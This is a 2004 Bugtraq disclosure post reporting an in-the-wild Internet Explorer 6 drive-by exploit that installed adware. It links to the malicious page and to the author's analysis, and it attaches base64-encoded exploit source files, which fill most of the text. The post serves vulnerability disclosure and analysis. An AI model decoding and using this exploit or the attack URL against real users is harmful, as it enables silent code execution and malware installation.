[35162] in bugtraq
Internet explorer 6 execution of arbitrary code (An analysis of the
daemon@ATHENA.MIT.EDU (Jelmer)
Mon Jun 7 12:20:29 2004
Date: Mon, 07 Jun 2004 03:21:52 +0200
From: Jelmer <jkuperus@planet.nl>
To: bugtraq@securityfocus.com
Cc: full-disclosure@lists.netsys.com, peter@diplomatmail.net
Message-id: <000001c44c2d$d33df9b0$3200000a@alex>
MIME-version: 1.0
Content-type: multipart/mixed; boundary="Boundary_(ID_AEMqBSqgyKLiEWLx0PCVpQ)"
This is a multi-part message in MIME format.
--Boundary_(ID_AEMqBSqgyKLiEWLx0PCVpQ)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: quoted-printable
Just when I though it was save to once=A0more=A0use internet explorer I =
received
an=A0email bringing my attention to this webpage
http://216.130.188.219/ei2/installer.htm =A0 that according to him used =
an
exploit that affected fully patched internet explorer 6 browsers. Being
rather skeptical I carelessly clicked on the link only to witness how it
automatically installed addware on my pc!!!
=A0
Now there had been reports about 0day exploits making rounds for quite =
some
time like for instance this post
=A0
http://www.securityfocus.com/archive/1/363338/2004-05-11/2004-05-17/0=20
=A0
However I hadn't seen any evidence to support this up until now
Thor Larholm as usual added to the confusion by deliberately spreading
disinformation as seen in this post
=A0
http://seclists.org/lists/bugtraq/2004/May/0153.html
=A0
Attributing it to and I quote "just one of the remaining IE =
vulnerabilities
that are not yet patched"
I=92ve attempted to write up an analysis that will show that there are =
at
least 2 new and AFAIK unpublished vulnerabilities (feel free to proof me
wrong) out there in the wild, one being fairly sophisticated=20
You can view it at:
http://62.131.86.111/analysis.htm
Additionally you can view a harmless demonstration of the =
vulnerabilities at
http://62.131.86.111/security/idiots/repro/installer.htm
Finally I also attached the source files to this message
--Boundary_(ID_AEMqBSqgyKLiEWLx0PCVpQ)
Content-type: application/octet-stream; name=exploit.zip
Content-transfer-encoding: base64
Content-disposition: attachment; filename=exploit.zip
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
--Boundary_(ID_AEMqBSqgyKLiEWLx0PCVpQ)--
